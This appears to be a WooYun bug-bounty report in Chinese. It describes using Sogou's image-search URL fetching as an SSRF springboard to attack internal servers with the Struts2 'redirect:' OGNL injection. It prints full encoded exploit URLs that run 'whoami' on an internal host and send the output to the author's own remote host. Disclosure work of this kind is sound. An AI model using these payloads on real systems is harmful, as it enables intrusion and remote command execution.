WooYun.org

在上次提到的漏洞中（ WooYun: 通过搜狗某搜索功能扫描搜狗内网 ），使用图片搜索功能成功判断到了搜狗内部服务器的开放情况，搜集到了大量的服务器ip：

本来觉得除了扫描开放的服务器之外这个应该没有什么其他的利用价值了，不过仔细思考了一番，既然可以通过这个功能访问内网web服务器，那么如果发送一个代用攻击指令的url到了特定的内网服务器上，这个服务器恰好有漏洞，那么是不是就可以用这个搜索功能作为跳板攻击到搜狗内网了呢？
那么什么url具有攻击性呢？这里只能提交url，也就是说只能是get请求，于是我想到了前段时间闹得很凶的struts2命令执行漏洞，于是构造下面这样的url：
http://pic.sogou.com/ris?query=http%3A%2F%2F192.168.x.x%3A80%2Findex.action%3Fredirect%3A%24%7Bnew%2520java.net.URL%28%27http%3A%2F%2F1.1.1.1%3A80%2Fo.jsp%3F192.168.x.x%27%29.openConnection%28%29.getInputStream%28%29%7D
解释一下，因为服务器在内网，而且又是通过这个搜索功能作为跳板，那么我就无法直接看到命令是否执行所以，通过java构造一个http请求，让他把信息get到我远程的jsp文件上去（http://1.1.1.1/o.jsp）,返回的信息就是内网服务器的ip地址。
还是用程序跑：

尝试了login.action、index.action，跑了半天没结果，后来想了一下，struts2官网提供过几个示例程序，很多开发人员都把他们部署在服务器上做参考，其中最简单的一个叫struts-blank，就是一个struts2框架的helloworld，于是构造类似这样的url，再跑一次：
http://pic.sogou.com/ris?query=http%3A%2F%2F192.168.x.x%3A8080%2Fstruts2-blank%2Findex.action%3Fredirect%3A%24%7Bnew%2520java.net.URL%28%27http%3A%2F%2F1.1.1.1%3A80%2Fo.jsp%3F192.168.x.x%27%29.openConnection%28%29.getInputStream%28%29%7D
这次太幸运了，远程的o.jsp成功获得了一个ip地址：

接下来的事情就是针对这个ip构造执行命令的poc了，url如下：
http://pic.sogou.com/ris?query=http%3A%2F%2F192.168.x.x%3A8080%2Fstruts2-blank%2Findex.action%3Fredirect%3A%24%7Bnew%2520java.net.URL%28%27http%3A%2F%2F1.1.1.1%3A80%2Fo.jsp%3F%27%252Bnew+java.io.BufferedReader%28new+java.io.InputStreamReader%28new+java.lang.ProcessBuilder%28%7B%27whoami%27%7D%29.start%28%29.getInputStream%28%29%29%29.readLine%28%29%29.openConnection%28%29.getInputStream%28%29%7D
就是通过struts2漏洞执行whoami命令，结果o.jsp上收到了命令执行结果：

执行pwd：

如果再变换一些action名称的话，估计还能找到一些存在漏洞的服务器，这里就不搞了，申请奖品啊。